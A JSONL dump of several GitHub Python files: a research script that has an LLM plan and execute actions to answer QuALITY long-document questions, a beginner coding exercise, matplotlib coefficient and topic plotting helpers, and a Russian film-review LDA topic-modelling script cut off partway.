+{"seq_id":"37241773838","text":"import csv\nimport pdb\nimport json\nfrom utils import *\nimport argparse\nfrom tqdm import tqdm\n\nopenai_setapi()\n\ndef mine_actions(args):\n # get converted questions\n fname = \"./data/processed/quality_train_q.csv\"\n questions = load_questions(fname)\n qfilter = load_question_filter()\n questions = {qid: questions[qid] for qid in questions if qid not in qfilter['train_long']}\n print(f\"number of questions: {len(questions)}\")\n prompt = load_prompt(f\"./prompt_bank/mine_actions.txt\")\n\n # mine actions\n with open(args.output_file, \"w+\") as f:\n writer = csv.DictWriter(f, fieldnames=[\"qid\", \"question\"])\n writer.writeheader()\n ret = []\n for qid in tqdm(questions):\n item = questions[qid]\n this_ret = {\"qid\": qid}\n this_question = item['question']\n this_prompt = prompt.replace(\"{{question}}\", this_question)\n response = get_response(this_prompt,\n model=model_name,\n max_tokens=512,\n frequency_penalty=0.0,\n temperature=0.0,\n top_p=0.0,\n stop=[\"<|im_end|>\", \"\\n\\n\\n\", \"---\"])\n this_ret['question'] = response\n ret.append(this_ret)\n writer.writerow(this_ret)\n\n # aggregate actions\n all_new_actions = []\n for item in ret:\n this_actions = item['question']\n try:\n new_actions = this_actions[:this_actions.index(\"My sequence of actions:\")]\n new_actions = new_actions[new_actions.index(\"\\n\")+1:]\n new_actions = [x.strip() for x in new_actions.split(\"\\n\") if \"none\" not in x.lower() and len(x.strip()) > 0]\n all_new_actions.extend(new_actions)\n except:\n continue\n all_new_actions = set(all_new_actions)\n print(f\"number of actions: {len(all_new_actions)}\")\n \n merged_actions = {}\n for action in all_new_actions:\n action_name = action.split(\":\")[0].strip()\n definition = action.split(\":\")[1].strip()\n merged_actions[action_name] = definition\n\n out_str = ''\n for action in merged_actions:\n out_str += f\"{action.lstrip('-').strip()}\\t#{merged_actions[action]}\\n\"\n \n with open(args.output_file, \"w\") as f:\n f.write(out_str)\n\ndef simplify_actions(args):\n input_actions = load_text(args.input_file).split('\\n')\n simplify_prompt = load_prompt(f\"./prompt_bank/simplify_actions.txt\")\n shard_size = args.shard_size\n num_shards = len(input_actions) // shard_size + 1\n output = ''\n for i in range(num_shards):\n this_shard = input_actions[i*shard_size : min((i+1)*shard_size, len(input_actions))]\n this_total_actions = '\\n'.join(this_shard)\n this_prompt = simplify_prompt.replace(\"{action_list}\", this_total_actions)\n response = get_response(this_prompt,\n model=model_name, \n frequency_penalty=0, \n temperature=0.0, \n top_p=0.0,\n stop=[\"\\n\\n\\n\"],\n max_tokens=2048)\n output += response.strip() + \"\\n\"\n \n with open(args.output_file, \"w\") as f:\n f.write(output)\n\ndef load_actions():\n global all_actions\n all_actions = {}\n\n with open(f\"./output/mined_actions_simplified_example.txt\", \"r\") as f:\n for line in f:\n try:\n lsp = line.split(\"#\")\n action_type = lsp[0][:lsp[0].index(\"(\")]\n action_args = lsp[0][lsp[0].index(\"(\")+1:lsp[0].index(\")\")].split(\",\")\n action_def = lsp[1].strip()\n if action_type in all_actions:\n print(f\"Warning: {action_type} already exists\")\n all_actions[action_type] = {\"args\": [x.strip() for x in action_args], \"action_def\": action_def}\n except:\n pdb.set_trace()\n\n print(len(all_actions))\n\ndef get_option_str(question):\n options = ''\n for idx in range(1, 5):\n option = question[f'option_{idx}']\n options += f'{option_map[idx]}: 
{option}\\n'\n return options\n\ndef load_article(fname):\n with open(fname, \"r\") as f:\n data = f.readlines()\n data = [json.loads(x) for x in data]\n # get rid of excessive newlines\n data = {x['article_id']: process_article(x['article'], chunk_size=-1) for x in data}\n return data\n\ndef load_quality_data(this_split, this_type):\n qfilter = load_question_filter()\n if this_split == \"dev\":\n articles = load_article(\"./data/raw/QuALITY.v1.0.1.htmlstripped.dev\")\n questions = load_questions(\"./data/processed/quality_dev_q.csv\")\n if this_type == \"ctx_eval_long\":\n long_qids = qfilter['dev_long']\n elif this_type == \"ctx_eval_short\":\n long_qids = qfilter['dev_short']\n else:\n raise ValueError(f\"Unknown example type {this_type}\")\n questions = {qid:questions[qid] for qid in questions if qid in long_qids}\n elif this_split == \"train\":\n articles = load_article(\"./data/raw/QuALITY.v1.0.1.htmlstripped.train\")\n questions = load_questions(\"./data/processed/quality_train_q.csv\")\n if this_type == \"ctx_eval_long\":\n long_qids = qfilter['train_long']\n else:\n raise ValueError(f\"Unknown example type {this_type}\")\n questions = {qid:questions[qid] for qid in questions if qid in long_qids}\n elif this_split == \"train-demo\":\n articles = load_article(\"./data/raw/QuALITY.v1.0.1.htmlstripped.train\")\n questions = load_questions(\"./data/processed/quality_train_q.csv\")\n qids = qfilter['train_demo']\n questions = {qid:questions[qid] for qid in questions if qid in qids}\n else:\n raise ValueError(f\"Unknown split {this_split}\")\n print(f\"Loaded {len(articles)} articles and {len(questions)} questions\")\n return articles, questions\n\ndef load_csv(fname):\n with open(fname, \"r\") as f:\n reader = csv.DictReader(f)\n ret = {}\n for row in reader:\n ret[row[\"qid\"]] = row\n return ret\n\nclass Action(object):\n def __init__(self, question, entire_plan, action_type, detailed_action, action_def=None, current_action=None):\n\n global all_actions\n self.this_action = action_type\n self.args = all_actions[action_type][\"args\"]\n self.action_def = all_actions[action_type][\"action_def\"] if action_def is None else action_def\n original_action = f\"{action_type}({','.join(self.args)})\"\n self.entire_plan = [x for x in entire_plan.split(\"\\n\\n\") if len(x.strip()) > 0][1]\n self.question = question\n self.current_action = current_action\n self.this_prompt = \"\"\n if \"CTX\" in original_action:\n self.this_prompt += \"{{CTX}}\\n---\\n\\nPlease read the above text first, and then follow the instructions below.\\n\\n\"\n\n self.this_prompt += f\"[Instruction]\\nAction:\\n\\n{original_action} : {self.action_def}\\n\\nthis_args\\n---\\n\\n[Answer]\\n(list or paragraph(s), please be thorough)\\n({detailed_action})\\n\" \n\n def execute(self, *args):\n try:\n assert len(args) == len(self.args)\n\n if 'current_action' in self.this_prompt:\n self.this_prompt = self.this_prompt.replace('current_action', self.current_action)\n\n if \"{{CTX}}\" in self.this_prompt:\n self.this_prompt = self.this_prompt.replace(\"{{CTX}}\", args[0])\n args = args[1:]\n self.args = self.args[1:]\n\n if 'current_action' not in self.this_prompt:\n args_str = \"\"\n for i in range(len(args)):\n args_str += f\"{self.args[i]} = {args[i]}\\n\"\n self.this_prompt = self.this_prompt.replace(\"this_args\", args_str)\n \n response = get_response(self.this_prompt,\n model=model_name, \n frequency_penalty=0, \n temperature=0.0, \n top_p=0.0,\n stop=[\"\\n\\n\\n\"],\n max_tokens=512)\n except Exception as e:\n 
print(e)\n print(self.this_prompt)\n print(args)\n print(self.args)\n return response\n \n def __call__(self, *args):\n if self.this_action != \"CONCAT\":\n return self.execute(*args)\n else:\n return \"\\n\".join(args)\n\ndef generate_plan(question, \n invalid_plan=None, \n error_message=None, \n all_error_messages=None, \n debug=False, \n plan_prompt=None,\n plan_prompt_invalid=None):\n\n action_list = load_text(\"./output/mined_actions_simplified_example.txt\")\n\n if invalid_plan is None:\n plan_generation_prompt = load_prompt(plan_prompt)\n plan_generation_prompt = plan_generation_prompt.format(action_list=action_list, question=question)\n else:\n plan_generation_prompt = load_prompt(plan_prompt_invalid)\n plan_generation_prompt = plan_generation_prompt.format(action_list=action_list, question=question, invalid_plan=invalid_plan, error_message=error_message, all_error_messages='\\n\\t' + '\\n\\t'.join(all_error_messages))\n if debug:\n print(plan_generation_prompt)\n response = get_response(plan_generation_prompt,\n model=model_name, \n frequency_penalty=0, \n temperature=0.0, \n top_p=0.0,\n stop=[\"\\n\\n\\n\"],\n max_tokens=256)\n if debug:\n print(response)\n\n plan = response\n return plan\n\ndef parse_plan(plan):\n \"\"\"\n Input: plan of the format:\n New actions:\n - new_action_1(args) : one sentence of explanation\n\n output_1 = action_1(args for action_1) : explanation\n output_2 = action_2(args for action_2) : explanation\n ...\n\n Output (if valid plan):\n is_valid\n actions: a list of actions, each item is a map of the format:\n {\"action\": action_name, \n \"args\": [arg1, arg2, ...], \n \"output_var\": output_name,\n \"detailed_action\": detailed_action_string,\n 'action_def': action_def if it is a new action}\n output_map: a map of the format:\n {\"output_1\": None, \"output_2\": None, ...}\n \n Output (if invalid plan):\n is_valid\n error message\n invalid plan\n \"\"\"\n global all_actions\n # separate new actions from plans\n plan_sp = [x for x in plan.split(\"\\n\\n\") if len(x.strip()) > 0]\n if len(plan_sp) != 2:\n error_message = \"Invalid plan: Need to have two parts (new actions and plan) separated by a blank line.\"\n return False, error_message, \"\\n\\n\".join(plan_sp)\n\n new_actions = plan_sp[0]\n plan = plan_sp[1]\n\n # parse new actions\n try:\n new_actions = [x.replace(\"- \", \"\").strip() for x in new_actions.split(\"\\n\")[1:] if len(x.strip()) > 0]\n this_new_actions = {}\n for line in new_actions:\n if \"none\" in line.lower():\n break\n lsp = line.split(\":\")\n action_type = lsp[0][:lsp[0].index(\"(\")]\n action_args = lsp[0][lsp[0].index(\"(\")+1:lsp[0].index(\")\")].split(\",\")\n action_def = lsp[1].strip()\n all_actions[action_type] = {\"args\": [x.strip() for x in action_args], \"action_def\": action_def}\n except:\n error_message = \"Invalid plan: new actions format is incorrect.\"\n return False, error_message, '\\n\\n'.join(plan_sp)\n \n # parse plan\n plan = [x.strip() for x in plan.split(\"\\n\") if len(x.strip()) > 0]\n output_map = {}\n actions = []\n for row in plan:\n try:\n row = row[row.index(\".\")+1:].strip()\n except:\n error_message = f\"Invalid plan: no number index and '.' 
found in action \\n\\t{row}.\"\n return False, error_message, \"\\n\".join(plan)\n\n try:\n row = row.split(\"=\")\n except:\n error_message = \"Invalid plan: no '=' found in one of the actions\"\n return False, error_message, \"\\n\".join(plan)\n\n try:\n output = row[0].strip()\n output_map[output] = None\n action_and_args = row[1][:row[1].index(\":\")].strip()\n action_and_args = action_and_args.split(\"(\")\n action_definitions = row[1][row[1].index(\":\")+1:].strip()\n action = action_and_args[0].strip()\n args = [x.lstrip().rstrip() for x in action_and_args[1][:-1].split(\",\")]\n action_map = {\"action\": action, \"args\": args, \"output_var\": output, \"detailed_action\": action_definitions}\n actions.append(action_map)\n except:\n error_message = \"Error parsing plan. Plan format is incorrect. Please check the plan format.\"\n return False, error_message, \"\\n\".join(plan)\n \n for action in actions:\n if action[\"action\"] not in all_actions and action[\"action\"] not in this_new_actions:\n error_message = f\"Error parsing action {action['action']}. Unknown action.\"\n return False, error_message, \"\\n\".join(plan)\n \n if action[\"action\"] in this_new_actions:\n action[\"action_def\"] = this_new_actions[action[\"action\"]][\"action_def\"]\n defined_args = this_new_actions[action[\"action\"]][\"args\"]\n else:\n defined_args = all_actions[action[\"action\"]][\"args\"]\n\n this_args = action[\"args\"]\n\n if action[\"action\"] != \"CONCAT\":\n if len(defined_args) != len(this_args):\n error_message = f\"Error parsing action {action['action']}. Number of arguments is incorrect\"\n return False, error_message, \"\\n\".join(plan)\n\n if action[\"output_var\"] in this_args:\n error_message = f\"Error parsing action {action['action']}. Output variable is used as an argument\"\n return False, error_message, \"\\n\".join(plan)\n\n for arg in action[\"args\"]:\n if arg == \"CTX\":\n continue\n if arg not in output_map and \"\\\"\" not in arg:\n error_message = f\"Error parsing action {action['action']}. 
Argument {arg} is not defined.\"\n return False, error_message, \"\\n\".join(plan)\n \n return True, actions, output_map\n\ndef execute_plan(actions, plan, question, output_map, article, debug=False):\n \"\"\"\n Input:\n actions: a list of actions, each item is a map of the format:\n {\"action\": action_name, \n \"args\": [arg1, arg2, ...], \n \"output_var\": output_name\n \"detailed_action\": detailed_action_string,\n \"action_def\": action_def if it is a new action}\n plan: the plan in string format\n output_map: a map of the format \n {\"output_1\": None, \"output_2\": None, ...} which stores \n the value of each output variable\n article: the article\n debug: whether to print debug information\n Output:\n end_response: concatenation of last step output and intermediate output if it is not fed as input to other actions\n \"\"\"\n all_args = []\n max_len = 8192\n reslen = 512\n for action in actions:\n action_name = action[\"action\"]\n args = action[\"args\"]\n current_action = f'{action_name}({\", \".join(args)})'\n all_args.extend(args)\n args = [x if x == \"CTX\" or \"\\\"\" in x else output_map[x] for x in args]\n args = [article if x == \"CTX\" else x for x in args]\n if \"action_def\" in action:\n action_func = Action(question, plan, action_name, action[\"detailed_action\"], action_def=action[\"action_def\"], current_action=current_action) \n else:\n action_func = Action(question, plan, action_name, action[\"detailed_action\"], current_action=current_action)\n action_func_prompt = action_func.this_prompt\n if sum([len(enc.encode(x)) for x in args]) + len(enc.encode(action_func_prompt)) + reslen + 1 > max_len:\n truncated_idx = sum([len(enc.encode(x)) for x in args]) + len(enc.encode(action_func_prompt)) + reslen + 1 - max_len\n args[0] = enc.decode(enc.encode(args[0])[:-truncated_idx]) + \"...\"\n try:\n output = action_func(*args)\n except:\n print(\"Error executing action\")\n print(action)\n print(args)\n print(output_map)\n return None\n \n output_map[action[\"output_var\"]] = output + \"\\n\"\n if debug:\n print(action)\n print(output)\n print(\"=\"*23)\n \n # TODO: new\n end_response = \"\"\n for action in actions:\n if action[\"output_var\"] not in all_args:\n end_response += output_map[action[\"output_var\"]] + \"\\n\\n\"\n return end_response\n\ndef _pearl(args, article, qid, question, options, invalid_plan=None, all_error_messages=[]):\n \"\"\"\n execute pearl for individual example\n \"\"\"\n error_message = None\n retry_cnt = 0\n all_error_messages = all_error_messages\n while True:\n # generate plan, if plan is invalid, ask the model to correct+refine the plan\n plan_str = generate_plan(question[\"question\"], \n invalid_plan=invalid_plan, \n error_message=error_message, \n all_error_messages=all_error_messages, \n debug=args.debug, \n plan_prompt=args.prompt_plan_file,\n plan_prompt_invalid=args.prompt_plan_invalid_file,)\n # parse plan\n is_valid, out_1, out_2 = parse_plan(plan_str)\n if is_valid:\n plan = out_1\n output_map = out_2\n break\n else:\n error_message = out_1\n invalid_plan = plan_str\n retry_cnt += 1\n print(error_message)\n all_error_messages.append(error_message)\n if retry_cnt > 7:\n break\n\n if retry_cnt > 7:\n print(f\"Error: {qid}\")\n print(\"Need to fallback to baseline open-answer\")\n continue\n\n if args.debug:\n print(f\"Plan: {plan}\")\n\n # execute plan \n response = execute_plan(plan, plan_str, question[\"question\"], output_map, article, debug=args.debug)\n # map open answer to choice\n this_map_prompt = 
map_prompt.format(open_answer=response, question=question[\"question\"], options=options)\n\n map_response = get_response(this_map_prompt,\n model=model_name,\n frequency_penalty=0,\n temperature=0.0,\n top_p=0.0,\n stop=[\"\\n\\n\\n\"],\n max_tokens=4)[0]\n\n if args.debug:\n print(f\"Answer: {response}\")\n print(f\"Map prompt: {this_map_prompt}\")\n print(f\"Map answer: {map_response}\")\n print(\"=\"*20)\n \n res_dict = {\"qid\": qid, \n \"plan\": plan_str, \n \"open-answer\": response, \n \"map-answer\": map_response, \n \"gold\": option_map[int(question['gold_label'])]}\n return res_dict, output_map\n\ndef refine(args):\n '''\n Refine the demonstration examples that are incoporated into the plan formulation stage\n The demonstration examples should not be any examples the model is evaluated on\n '''\n global debug\n debug = args.debug\n\n articles, questions = load_quality_data(\"train-demo\", None)\n with open(args.output_file + f\".train_demo.csv\", \"w\") as f:\n writer = csv.DictWriter(f, fieldnames=[\"qid\", \"plan\", \"open-answer\", \"map-answer\", \"gold\"])\n writer.writeheader()\n\n for qi, qid in enumerate(tqdm(questions)):\n try:\n question = questions[qid]\n options = get_option_str(question)\n article = articles[question[\"article_id\"]]\n\n retry_cnt = 0\n all_error_messages = []\n first_incorrect_plan = None\n invalid_plan = None\n while True:\n res_dict, _ = _pearl(args, article, qid, question, options, invalid_plan=invalid_plan, all_error_messages=all_error_messages)\n if res_dict[\"map-answer\"] == res_dict[\"gold\"]:\n break\n else:\n invalid_plan = res_dict[\"plan\"]\n if first_incorrect_plan is None:\n first_incorrect_plan = invalid_plan\n retry_cnt += 1\n all_error_messages.append(f\"{invalid_plan.lstrip().rstrip()}\\n\\nError: Incorrect plan. Could not map to correct answer. Please rethink the plan strategy.\\n\\n\")\n if retry_cnt > 3:\n break\n if retry_cnt > 3:\n continue\n writer.writerow(res_dict)\n\n except Exception as e:\n print(f\"Error: {qid}\")\n print(e)\n continue\n\n # print output\n with open(args.output_file + f\".train_demo.csv\", \"r\") as f:\n reader = csv.DictReader(f)\n for row in reader:\n qid = row[\"qid\"]\n question = questions[qid]['question'].strip()\n plan = row[\"plan\"]\n\n print(f\"Question: \\\"{question}\\\"\\n\\nAnswer:\\n{plan}\\n---\\n\")\n\ndef baseline_mcq(args, this_split=\"dev\", this_type=\"ctx_eval_long\"):\n # load prompt\n prompt = \"Article\\n\\n{article}End of Article\\n\\nQuestion:{question}\\n{options}\\n\\nRead the article and answer the question by selecting the best option. 
Only one of the options is correct.\\n\\nAnswer (select from A, B, C, D):\\n\"\n \n articles, questions = load_quality_data(this_split, this_type)\n\n # for each question, generate open-ended answer with options and write to file\n # write to file\n with open(args.output_file + f\".{this_split}.{this_type}.csv\", \"w\") as f:\n writer = csv.DictWriter(f, fieldnames=[\"qid\", \"answer\", \"gold\"])\n writer.writeheader()\n total_cnt = 0\n crrc_cnt = 0\n for qid in tqdm(questions):\n try:\n question = questions[qid]\n options = get_option_str(question)\n article = articles[question[\"article_id\"]]\n this_prompt = prompt.format(article=article, question=question[\"question\"], options=options)\n \n len_this_prompt = len(enc.encode(this_prompt))\n if len_this_prompt + max_output_len > 8192:\n if args.debug:\n print(f\"Exceed length limit: {len_this_prompt}\")\n article = enc.decode(enc.encode(article)[:-(len_this_prompt + max_output_len - 8192 + 1)])\n this_prompt = prompt.format(article=article, question=question[\"question\"], options=options)\n \n response = get_response(this_prompt,\n model=model_name, \n frequency_penalty=0, \n temperature=0.0, \n top_p=0.0,\n stop=[\"\\n\\n\\n\"],\n max_tokens=5)[0]\n os.system(\"sleep 5s\") \n if args.debug:\n print(f\"Prompt: {this_prompt}\")\n print(f\"Answer: {response}\")\n print(\"=\"*20)\n writer.writerow({\"qid\": qid, \"answer\": response, 'gold': option_map[int(question['gold_label'])]})\n total_cnt += 1\n crrc_cnt += 1 if response == option_map[int(question['gold_label'])] else 0\n print(f\"Accuracy: {crrc_cnt / total_cnt}\")\n\n except Exception as e:\n print(e)\n continue\n print(f\"Accuracy: {crrc_cnt / total_cnt}\") \n\ndef baseline_gqa(args, this_split=\"dev\", this_type=\"ctx_eval_long\"):\n # load prompt\n this_prompt_template = load_prompt(f\"./prompt_bank/freeform_ans.txt\")\n \n articles, questions = load_quality_data(this_split, this_type)\n\n # for each question, generate open-ended answer with options and write to file\n # write to file\n with open(args.output_file + f\".{this_split}.{this_type}.csv\", \"w\") as f:\n writer = csv.DictWriter(f, fieldnames=[\"qid\", \"open-answer\", \"map-answer\", \"gold\"])\n writer.writeheader()\n total_cnt = 0\n crrc_cnt = 0\n\n for qid in tqdm(questions):\n try:\n question = questions[qid]\n options = get_option_str(question)\n article = articles[question[\"article_id\"]]\n this_prompt = this_prompt_template.format(article=article, question=question[\"question\"])\n len_this_prompt = len(enc.encode(this_prompt))\n if len_this_prompt + max_output_len > 8192:\n if args.debug:\n print(f\"Exceed length limit: {len_this_prompt}\")\n article = enc.decode(enc.encode(article)[:-(len_this_prompt + max_output_len - 8192 + 1)])\n this_prompt = this_prompt_template.format(article=article, question=question[\"question\"])\n \n response = get_response(this_prompt,\n model=model_name, \n frequency_penalty=0, \n temperature=0.0, \n top_p=0.0,\n stop=[\"\\n\\n\\n\"],\n max_tokens=max_output_len)\n os.system(\"sleep 5s\") # change this if there aren't any excessive rate limit errors\n\n this_map_prompt = map_prompt.format(open_answer=response, question=question[\"question\"], options=options)\n \n map_response = get_response(this_map_prompt,\n model=model_name,\n frequency_penalty=0,\n temperature=0.0,\n top_p=0.0,\n stop=[\"\\n\\n\\n\"],\n max_tokens=4)[0]\n if args.debug:\n print(f\"Prompt: {this_prompt}\")\n print(f\"Answer: {response}\")\n print(f\"Map prompt: {this_map_prompt}\")\n print(f\"Map answer: 
{map_response}\")\n print(\"=\"*20)\n\n writer.writerow({\"qid\": qid, \"open-answer\": response, \"map-answer\": map_response, 'gold': option_map[int(question['gold_label'])]})\n total_cnt += 1\n crrc_cnt += 1 if map_response == option_map[int(question['gold_label'])] else 0\n print(f\"Accuracy: {crrc_cnt/total_cnt}\")\n except Exception as e:\n print(f\"Error: {qid}\")\n print(e)\n continue\n\ndef pearl(args, this_split=\"dev\", this_type=\"ctx_eval_long\"):\n\n global debug \n debug = args.debug\n\n articles, questions = load_quality_data(this_split, this_type)\n\n all_output_map = {}\n with open(args.output_file + f\".{this_split}.{this_type}.csv\", \"w\") as f:\n writer = csv.DictWriter(f, fieldnames=[\"qid\", \"plan\", \"open-answer\", \"map-answer\", \"gold\"])\n writer.writeheader()\n total_cnt = 0\n crrc_cnt = 0\n \n for qi, qid in enumerate(tqdm(questions)):\n try:\n question = questions[qid]\n options = get_option_str(question)\n article = articles[question[\"article_id\"]]\n\n res_dict, output_map = _pearl(args, article, qid, question, options)\n writer.writerow(res_dict)\n \n all_output_map[qid] = output_map\n\n total_cnt += 1\n if res_dict[\"map-answer\"] == res_dict[\"gold\"]:\n crrc_cnt += 1\n \n print(f\"Accuracy: {crrc_cnt/total_cnt}\")\n\n except Exception as e:\n print(f\"Error: {qid}\")\n print(e)\n continue\n \n # save output_map to pickle\n output_map_file = args.output_file + f\".{this_split}.{this_type}.output_map.pkl\"\n with open(output_map_file, \"wb\") as f:\n pickle.dump(all_output_map, f, protocol=pickle.HIGHEST_PROTOCOL)\n \ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--stage\", type=str, choices=[\"mine_actions\", \"simplify_actions\", \"refine\", \"baseline_mcq\", \"baseline_gqa\", \"pearl\"])\n parser.add_argument(\"--prompt-plan-file\", type=str, default=\"\")\n parser.add_argument(\"--prompt-plan-invalid-file\", type=str, default=\"\")\n parser.add_argument(\"--input-file\", type=str, default=\"\")\n parser.add_argument(\"--output-file\", type=str, default=\"\")\n parser.add_argument(\"--debug\", action=\"store_true\", default=False)\n parser.add_argument(\"--shard-size\", type=int, default=80, help=\"number of actions per shard during action simplification\")\n return parser.parse_args()\n\ndef main():\n args = parse_args()\n if args.stage == \"mine_actions\":\n mine_actions(args)\n\n elif args.stage == \"simplify_actions\":\n simplify_actions(args)\n\n elif args.stage == \"refine\":\n load_actions()\n refine(args)\n\n elif args.stage == \"baseline_mcq\":\n baseline_mcq(args, this_split=\"dev\", this_type=\"ctx_eval_long\")\n baseline_mcq(args, this_split=\"train\", this_type=\"ctx_eval_long\")\n baseline_mcq(args, this_split=\"dev\", this_type=\"ctx_eval_short\")\n\n elif args.stage == \"baseline_gqa\":\n baseline_gqa(args, this_split=\"dev\", this_type=\"ctx_eval_long\")\n baseline_gqa(args, this_split=\"train\", this_type=\"ctx_eval_long\")\n baseline_gqa(args, this_split=\"dev\", this_type=\"ctx_eval_short\")\n\n elif args.stage == \"pearl\":\n load_actions()\n pearl(args, this_split=\"dev\", this_type=\"ctx_eval_long\")\n pearl(args, this_split=\"train\", this_type=\"ctx_eval_long\")\n pearl(args, this_split=\"dev\", this_type=\"ctx_eval_short\")\n \n else:\n raise ValueError(\"Unknown stage\")\n\nif __name__ == \"__main__\":\n 
main()","repo_name":"SimengSun/pearl","sub_path":"pearl.py","file_name":"pearl.py","file_ext":"py","file_size_in_byte":31077,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"61"}
+{"seq_id":"72297370435","text":"#1\na = [1, 2, 3, 6, 8, 12, 20, 32, 46, 85]\nb = []\nfor number in a:\n if number < 5:\n b.append(number)\nprint(b)\n\n\n#2\nlist_a = ['dog', 'cat', 'rabbit', 'hamster', 'gerbil']\nlist_b = ['dog', 'hamster', 'snake']\na = set(list_a)\nintersection = a.intersection(list_b)\nc = list(intersection)\nprint(c)\n\n\nd = set(list_a).symmetric_difference(list_b)\nprint(d)\ne = set(list_a) ^ set(list_b)\nprint(e)\n\n#3\nsentence = 'hi dee hi how are you mr dee'\nwords = sentence.split(' ')\nresult = {}\nfor word in words:\n result[word] = result.get(word, 0) + 1\ntotal = len(sentence.split())\nprint('word count:', result)\nprint('total words:',total)\n\n#4\nage = int(input(\"What is your age? \"))\nret = 65\nif age > ret:\n print(\"stop working, youre too old\")\nelif age == ret:\n print(\"you retire this year\")\nelse:\n retage = ret-int(age)\n print(\"you have \", retage, \" years until retirement, yikes...\")\n\n\n#5\nletter_scores = {'a': 1, 'b': 3, 'c': 3, 'd': 2, 'e': 1, 'f': 4,\n'g': 2, 'h': 4, 'i': 1, 'j': 8, 'k': 5, 'l': 1,\n'm': 3, 'n': 1, 'o': 1, 'p': 3, 'q': 10, 'r': 1,\n's': 1, 't': 1, 'u': 1, 'v': 4, 'w': 4, 'x': 8,\n'y': 4, 'z': 10,}\n\nword = input('Enter a word:')\nprint('your entered word is:', word)\nword_score = 0\nfor letter in word:\n word_score += letter_scores[letter]\nprint('your word score is: ', word_score)\n","repo_name":"nickcurci/ArcPy","sub_path":"CodingChallenges/2 - Week_Two/1- Coding Challenge One For Week2.py","file_name":"1- Coding Challenge One For Week2.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"17673425330","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom matplotlib.colors import ListedColormap, colorConverter, LinearSegmentedColormap\n\n# from https://github.com/amueller/mglearn/blob/cbae37d906261dad173cbc6696dcef69dfd0cbaf/mglearn/plot_helpers.py\ncm = ListedColormap(['#0000aa', '#ff2020'])\n\n\n# from https://github.com/amueller/mglearn/blob/cbae37d906261dad173cbc6696dcef69dfd0cbaf/mglearn/tools.py\ndef visualize_coefficients(coefficients, feature_names, n_top_features=25):\n \"\"\"Visualize coefficients of a linear model.\n Parameters\n ----------\n coefficients : nd-array, shape (n_features,)\n Model coefficients.\n feature_names : list or nd-array of strings, shape (n_features,)\n Feature names for labeling the coefficients.\n n_top_features : int, default=25\n How many features to show. The function will show the largest (most\n positive) and smallest (most negative) n_top_features coefficients,\n for a total of 2 * n_top_features coefficients.\n \"\"\"\n coefficients = coefficients.squeeze()\n if coefficients.ndim > 1:\n # this is not a row or column vector\n raise ValueError(\"coeffients must be 1d array or column vector, got\"\n \" shape {}\".format(coefficients.shape))\n coefficients = coefficients.ravel()\n\n if len(coefficients) != len(feature_names):\n raise ValueError(\"Number of coefficients {} doesn't match number of\"\n \"feature names {}.\".format(len(coefficients),\n len(feature_names)))\n # get coefficients with large absolute values\n coef = coefficients.ravel()\n positive_coefficients = np.argsort(coef)[-n_top_features:]\n negative_coefficients = np.argsort(coef)[:n_top_features]\n interesting_coefficients = np.hstack([negative_coefficients,\n positive_coefficients])\n # plot them\n plt.figure(figsize=(15, 5))\n colors = [cm(1) if c < 0 else cm(0)\n for c in coef[interesting_coefficients]]\n plt.bar(np.arange(2 * n_top_features), coef[interesting_coefficients],\n color=colors)\n feature_names = np.array(feature_names)\n plt.subplots_adjust(bottom=0.3)\n plt.xticks(np.arange(1, 1 + 2 * n_top_features),\n feature_names[interesting_coefficients], rotation=60,\n ha=\"right\")\n plt.ylabel(\"Coefficient magnitude\")\n plt.xlabel(\"Feature\")\n \n \n# from https://github.com/amueller/mglearn/blob/cbae37d906261dad173cbc6696dcef69dfd0cbaf/mglearn/tools.py\ndef print_topics(topics, feature_names, sorting, topics_per_chunk=6,\n n_words=20):\n for i in range(0, len(topics), topics_per_chunk):\n # for each chunk:\n these_topics = topics[i: i + topics_per_chunk]\n # maybe we have less than topics_per_chunk left\n len_this_chunk = len(these_topics)\n # print topic headers\n print((\"topic {:<8}\" * len_this_chunk).format(*these_topics))\n print((\"-------- {0:<5}\" * len_this_chunk).format(\"\"))\n # print top n_words frequent words\n for i in range(n_words):\n try:\n print((\"{:<14}\" * len_this_chunk).format(\n *feature_names[sorting[these_topics, i]]))\n except:\n pass\n print(\"\\n\")\n","repo_name":"jkafrouni/text-deployment-demo","sub_path":"scripts/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"72356905795","text":"import nltk\nimport pandas\nimport pymorphy2\nimport gensim\nfrom gensim import corpora\nfrom gensim.models import CoherenceModel\nfrom nltk.corpus import stopwords\n\n\n# get normalized review function\ndef get_normalized_review(text):\n analyzer = pymorphy2.MorphAnalyzer()\n normalized_words = []\n tokens = nltk.word_tokenize(text)\n puncto = [',', '.', ':', '?', '«', '»', '-', '(', ')', '!', '\\'', '—', ';', '”', '...', '–']\n for token in tokens:\n if token in puncto: continue\n normalized_words.append(analyzer.parse(token)[0].normal_form)\n # added some stopwords which were received after the 1st run\n stopword_set = set(stopwords.words(\"russian\"))\n stopword_set.add('фильм')\n stopword_set.add('свои')\n stopword_set.add('это')\n stopword_set.add('весь')\n stopword_set.add('который')\n normalized_words = [w for w in normalized_words if not w in stopword_set]\n return normalized_words\n\n\n# filter reviews by its title\ndef filter_by_titles(data_frame, reviews_titles):\n return data_frame[~data_frame['title'].isin(reviews_titles)]\n\n\ndef main():\n dictionary = corpora.Dictionary(df['text'])\n corpus = [dictionary.doc2bow(text) for text in df['text']]\n\n # define numbers of topics and words\n topics_number_const = 10\n words_number_const = 15\n lda = gensim.models.ldamodel.LdaModel(corpus, num_topics=topics_number_const, id2word=dictionary, passes=15)\n\n for index, topic in lda.show_topics(num_topics=topics_number_const, formatted=False, num_words=words_number_const):\n print('Topic: {} \\nWords: {}'.format(index, [word[0] for word in topic]))\n\n cm = CoherenceModel(model=lda, texts=df['text'], dictionary=dictionary)\n coherence = cm.get_coherence()\n print(coherence)\n\n\n# all reviews\ndf = pandas.read_csv(\"filmreviews.csv\", encoding=\"utf-8\")\ndf['text'] = df['text'].map(lambda x: 